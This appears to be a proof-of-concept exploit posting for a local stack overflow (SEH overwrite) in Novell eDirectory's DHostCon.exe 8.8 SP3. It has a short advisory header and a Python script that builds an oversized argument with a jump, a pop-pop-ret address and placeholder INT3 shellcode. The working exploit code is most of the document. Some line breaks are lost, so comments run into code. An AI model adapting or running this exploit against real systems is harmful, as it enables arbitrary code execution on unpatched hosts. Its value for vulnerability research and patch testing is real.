# Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite# Date: 17/10/2010 # Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)# Software Link: http://www.novell.com/# Version: 8.8 SP3 (20216.67)]# Tested on: win32 xp sp3 (spa)#Summary:# DHostCon.exe is prone to local denial of service caused by stack overflow# triggered if user-supplied parameters are too long (1074 bytes).# Due nature of this vulnerabilty, attackers could exploit this issue# to execute arbitrary code on local host.#PoC:#!/usr/bin/python
import os,struct
def main():
path="C:\Novell\NDS\dhostcon.exe"
args="x.x.x.x"#ip server
buf="A"*1065
nseh=struct.pack("<L",0x90909eeb)#jmp short 0012ff50 +NOP + NOP
seh=struct.pack("<L",0x61012c20)#PPR dclient.dll
shellcode=struct.pack("<B",0xCC)#INT3
crash=buf+shellcode+nseh+seh
os.system(path+" "+args+" "+crash)#Crash!if __name__=="__main__":
main()
